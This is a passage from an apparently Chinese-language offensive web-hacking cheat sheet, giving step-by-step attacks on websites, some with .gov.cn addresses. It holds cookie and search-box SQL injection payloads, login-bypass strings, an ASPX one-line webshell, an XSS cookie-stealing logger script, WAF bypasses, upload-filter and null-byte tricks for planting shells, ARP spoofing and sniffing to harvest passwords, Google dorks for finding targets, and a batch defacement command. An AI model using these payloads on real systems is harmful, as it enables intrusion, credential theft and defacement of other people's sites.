下面开始在Cookie注入中执行常规注入攻击，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and 1=1″));
访问http://www.XXXXXXXX.gov.cn/shownews.asp 显示正常页面，
再提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2″));  显示错误页面！
下面来开始猜解表段，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select * from 表段)”))；
接着猜字段，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”))；  例如：username
接着猜字段，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”)),   例如：password
下面开始猜字段数跟字段内容了，提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2 union select 1,2,3,4,5,6 from 表段”));
一直猜解到对为止，这里只是猜到6，记得继续加减！猜解到对的时候，页面会出现数字，然后在相对应的数字替换字段名，再进行提交代码！
这时如果字段名猜对的话，就会爆出帐号密码了，不对的话继续替换字段名，位置不变！（存在cookie注入时建议参考mysql手工注入的语句）
=============================================================================================================================================================
【 伪静态注入 】
伪静态网站注入方法，莱鸟扫盲来了哦，通常情况下，动态脚本的网站的url类似下面这样：
http://www.91ri.org/news.php?id=111
做了伪静态之后就成这样了：
http://www.91ri.org/news.php/id/111.html
以斜杠“/”代替了“=”并在最后加上.html，这样一来，就无法直接用工具来注入了。
常规的伪静态页面如下：http://www.XXX.com/play/Diablo.html
例如关联的动态页面是game.php ，那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play&name=Diablo的形式
注入点检测可以用：http://www.XXX.com/play/Diablo‘ and 1=’1.html与http://www.XXX.com/play/Diablo‘ and 1=’2.html来判断
通常情况下，动态脚本的网站的url类似下面这样：http://www.xxoo.net/aa.php?id=123
做了伪静态之后类似这样：http://www.xxoo.net/aa.php/id/123.html 以斜杠“/”代替了“=”并在最后加上.html，这样一来，就无法直接用工具来注入了！
=============================================================================================================================================================
【 嗅探 】
当入侵一个网站，该网站没有任何漏洞的情况下，可以进行旁注，再提权拿下任意一台服务器，不行的话就C段，提权拿下任意一台服务器。
只要能拿下同网段的任意一台服务器，就可以使用C段嗅探来获取主站的帐号密码，cain是一款强大的劫持工具。
在服务器里安装cain后打开主控端，点击配置->选择服务器IP一项->在路由追踪一项取消全部->确定。
设置完毕后点击一下激动按钮(中间那个)，再点击嗅探器，点击加号符号，选择所有在子网主机，选择ARP测试(传播 31-位)，确定。
扫描完毕选择网关一项，点击ARP，点击加号符号，左边选择网关，右边选择全部的C段，确定，点击开始嗅探按钮(第三个)，嗅探到的帐号密码在口令一项展现！
如果发现没数据可以使用幻境网盾来限制网速，让cain的发包快过防火墙。
=============================================================================================================================================================
【 arp欺骗 】
只要该服务器存在C段，都可以尝试arp欺骗，用到的工具是NetFuke，想知道arp劫持能不能成功，cmd命令：arp -a  看一下，动态的服务器IP就能成功，静态的就不能。
安装完运行主控端，设置–嗅探设置–网卡选择服务器的IP–控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 确定。
设置–ARP欺骗–双向欺骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目标IP填要欺骗的任意C段ip(用御剑扫描C段)–确定。
插件管理–修改器–最后一个选项双击–在右边的HTML Body = [haha!!] 填写自己要展现的文字，点击开始即可欺骗成功！
=============================================================================================================================================================
【 突破安全狗防注入及上传 】
写入webshell 写不进去，平常的一句话 也失效，用这段代码：
<%@ Page Language=”C#” ValidateRequest=”false” %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
连接端用cncert的aspx一句话客户端
2、IIS6.0解析漏洞遇到安全狗
文件名为http://www.baicai.com/1.asp;1.jpg
这样的会被IIS安全狗果断屏蔽
改成如下名称,IIS6一样会解析:
www.baicai.com/;1.asp;1.jpg
3、安全狗的注入绕过
常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但这样就可以突破了：
baicai.asp?0day5.com=%00.&id=69%20 and 1=1
=============================================================================================================================================================
【 跨站xss 】
在网站留言或者能输入信息的地方提交跨站代码，从而盗取管理员cookie，然后用cookie浏览器直接进入后台，将以下代码保存为asp文件，例如1.asp

<%
thisfile=Server.MapPath(“cookie.txt”)
msg=Request(“msg”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉大侠”)
thisfile.close
set fs=nothing
%>

=============================================================================================================================================================

【 万能密码 】
( php )
帐号：’ UNION Select 1,1,1 FROM admin Where ”=’
密码：1
( asp )
‘xor
‘or’='or’
‘or”=”or”=’
‘or ’1′=’1′or ’1′=’1
‘or 1=1/*
=============================================================================================================================================================
【 批量关键词 】
inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id=           牛比
inurl:show.asp? 非常强大！！！！
site:www.yuming.com
inurl:articleshow.asp?articleid=数字 牛B
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?
=============================================================================================================================================================
【 批量挂黑页 】
cmd命令执行 dir d:\wwwroot /b >>1.txt
之后命令 for /f “tokens=* delims= ” %i in (d:\1.txt) do echo pause>>D:\wwwroot\%i\wwwroot\1.txt
=============================================================================================================================================================
【 木马后门 】
1.TNTHK小组内部版 —— 存在关键词后门，随便输入一个错的密码，右键查看源文件，找到错误关键词后面的font，在font后面的就是正确密码。
2.不灭之魂—不死僵尸变种 —— 用这款工具专门爆这款大马的密码：爆不灭之魂密码
3.终极防删免杀多功能VIP版本-无后门 —— 万能密码：wbgz   菜刀连接：kk
=============================================================================================================================================================
【 安全狗 】
1.过注入
方法一：a.asp?aaa=%00&id=sql语句
方法二： a.asp?id=sql语句   里面把安全过滤的加个%l 比如： un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
方法一：上传一个大马 然后访问http://sss.com/dama.asp; 访问后出现拦截。
那么解决方法 先将dama.asp改名dama.jpg上传，然后在同目录上传个文件da.asp 内容为： <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。
3.过菜刀连接一句话被拦截
方法一：不用菜刀连接一句话，用别的一句话连接端。
方法二：中转下连接菜刀，把过滤掉的词替换掉。
=============================================================================================================================================================
【 asp搜索框注入 】
在搜索框里，我们输入一个关键词，该关键词必须在这个站能搜索到信息。比如这个站我输入了1，搜索到了很多新闻，判断这个搜索框是否有注入漏动。
直接在前台的搜索框里注入被限制的话，可以本地构造表单进行注入：
<html>
<form name=”form1″ method=”post” action=”http://www.xxx.com/search.asp“>
类型：
<label>
<input name=”t” type=”text” id=”t” value=”1″>
</label>
<p>
内容：
<label>
<input name=”key” type=”text” id=”key”>
</label>
</p>
<p>
<label>
<input type=”submit” name=”Submit” value=”提交”>
</label>
</p>
</form>
1%’ ‘ and ‘%’='         系统报错
1%’ and 1=1 and ‘%’='   返回正确
1%’ and 1=2 and ‘%’='   返回错误
1%’ and (select count(*) from 表段) and ‘%’='   猜表段
1%’ and (select count(字段) from 表段) and ‘%’='  猜字段
1%’ and (select top 1 len(字段) from 表段)>16 and ‘%’='  猜字段长度
1%’ and (select top 1 asc(mid(name,1,1)) from 表段)>97 and ‘%’='   猜内容
用牛族字符转换器转换数字。（猜长度的时候，选择对的前面那个错的数字！或是直接把大于号改为等于号，看看正确就是了）
有的网站存在搜索框，利用这个搜索框进行注射从而爆出管理帐号密码：%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’
我们在搜索框里，搜索关键词1浏览器地址栏显示：http://www.XXXXXX.com/News_search.asp?key=1&otype=msg
这里的key=1，就是说我们搜索得关键词1，我们要做的就是把key=1放到最后面，把连接变成：http://www.XXXXXX.com/News_search.asp?otype=msg&key=1
或者直接把&otype=msg删除，变成：http://www.XXXXXX.com/News_search.asp?key=1
=============================================================================================================================================================
【 本地构造上传漏洞  】
寻找程序上传漏洞，必须从上传页面的源文件入手，目标有两个：
1.filename (文件名称)  在上传页面中针对文件扩展名过滤不严，从而上传可执行的脚本木马。
2.filepath (文件路径)  在上传页面针对路径过滤不严，导致可以修改上传相对路径上传脚本木马。
当检测到一个上传页面，asp、asa后缀已经被过滤掉的时候，可以尝试抓包明小子或NC上传！
不行就利用本地上传漏洞构造上传！例如上传页面是：http://www.baidu.com/upfile_other.asp
1.右键查看源文件，找到这段代码：<form name=”form1″ method=”past” action=”zwhua_upload1.asp” enctype=”multipart/form-data”>
  把以上代码中actino处的路径补全！即：<form name=”form1″ method=”past” action=”http://www.xxx.com/zwhua_upload1.asp” enctype=”multipart/form-data”>
2.再找到这段代码：<input type=”hidden” name=”filepath” value=”uploadfile/”>
  利用IIS6.0解析漏洞，把以上代码中value处的文件补全！即：<input type=”hidden” name=”filepath” value=”uploadfile/1.asa; “>  注意：冒号后面有空格！
3.接着保存为1.html，将刚保存的文件拖进去C32里，选择十六进制模式，找到“1.asa; ”后面的空格，将其填充为00后保存退出！
4.本地打开上传图片格式的木马(不成功时可以尝试上传一句话木马) ，如果提示成功后不显示路径的话，可以右键查看源文件自己手工找出路径访问即可！
=============================================================================================================================================================
【 利用双文件上传拿shell 】
因为网站只判断一次，如果第一个文件后缀是在白名单里面的话，就让其上传，并没有判断第二个文件，所以上传任意格式的文件也让其通过。
当系统验证cookie的时候，就要用到火狐浏览器了，登录网站进后台，让火狐浏览器保存管理员的cookie值，再把修改后的“双文件上传工具”拖进去上传。
1.在后台找上传点，右键查看源文件，找到上传地址，一般在post或action的附近，搜索即可找到，一般为：src=”../xxx.htm”  之后补全路径访问。
2.这个还不是真正的上传页面，真正的上传页面后缀是asp的，继续查看源代码，找到action=”xxx.asp”，补全路径访问即可！
4.其实也可以抓包从而获得上传路径，抓包之后，在Referer:这栏，还有常见的是：htto://www.xxxx.com/upfile_other.asp
3.打开双文件上传工具，替换为当前的上传地址，保存后拖进火狐浏览器里，第一个选择jpg木马，第二个选择cer木马，提交后右键查看源文件找出路径即可。
=============================================================================================================================================================
【 数据库备份抓包改包NC提交拿shell 】
当备份路径不能修改,后缀又是mdb不变的时候，我们可先对备份的过程进行抓包，再本地构造用NC提交即可突破备份，数据库恢复也可使用此方法！
在抓包的时候，最好用火狐浏览器，因为有的浏览器抓不到包，首先上传一张图片木马复制下地址，接着对备份过程进行抓包！把抓到的数据复制在文本里面！
开始本地修改，先把POST处补全网址，找到最底下的一行数据，再复制多一行对比长度进行修改，把备份的数据名称替换为木马地址，备份的名称改为自己想要的asp后缀！
再将原来的数据长度跟现在的对比同时替换掉，最后看一共增加了多少个字符，就在Content-Length:处进行增减，用NC提交数据格式：nc 域名 80<1.txt
=============================================================================================================================================================
【 本地构造数据库备份突破拿shell 】
当上传jpg木马得到路径前去备份时，发现数据库备功能用不了的情况下，可以尝试本地构造突破拿shell！
首先查看源文件，找到“当前数据库路径”修改为刚上传jpg木马的路径，再找到“数据库备份名称”修改为1.asa
找到“<form method=”past” action=”Backup.asp?action=Backup”>” 将路径补全“<form method=”past” action=”http://xxx.com/admin/Backup.asp?action=Backup“>”
最后保存为1.html，有的网站不验证cookie的话，直接打开进行备份就能成功了，但是一般都需要验证cookie，这时就用上火狐浏览器了。
因为火狐浏览器有保留cookie的功能，先登录后台，以管理员的权限进行上传，直接把1.html拖进火狐浏览器里，直接点击备份即可突破cookie验证！
=============================================================================================================================================================
【 本地构造限制上传类型漏洞 】
一般用于直接扫到的上传页面，名称是：上传图片，上传asp、asa等脚本时提示“请选择jpg或gif文件!”
这时通过这个方法一般都能成功，首先保存到本地1.asp  放到小旋风的目录下，然后找到以下这段代码：
    alert(“请点击浏览按钮，选择您要上传的jpg或gif文件!”)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=”.jpg” && extname!=”.gif”)
{
alert(“请选择jpg或gif文件!”);
看到这句代码：if(extname!=”.jpg” && extname!=”.gif”)  改为：    if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)
然后补充完整上传地址，action=这里，然后网页打开127.0.0.1 直接上传asp文件就可以了。
=============================================================================================================================================================
【 抓包改包NC提交拿shell 】
1.抓包数据中如果存在name=”filepath”或是name=”filename”，那么就可以满足NC的上传条件了。
2.将木马的抓包数据复制到文本文件中。例如：1.txt
3.将路径补全：
filepath截断法：
uploadfile/路径后添加1.asp空格 (16进制下面将20改为00)
filename自定义名称：
C:\Documents and Settings\lei\桌面\1.jpg (将1.jpg 改为 1.asp空格，16进制下将20改为00)
3.在Content-Length处加上../uploadfile/后增加的字节数。
4.用C32将空格的20改为00，保存为1.txt。
5.把1.txt跟nc.exe放在同一目录下，cmd命令：nc -vv www.XXXX.com 80<1.txt
( 如果上传成功后没有将木马解析成asp，可以尝试将文件名改成asa、cer、php 再不行就用IIS 6.0解析漏洞，将文件名改为1.asa;1.jpg )
=============================================================================================================================================================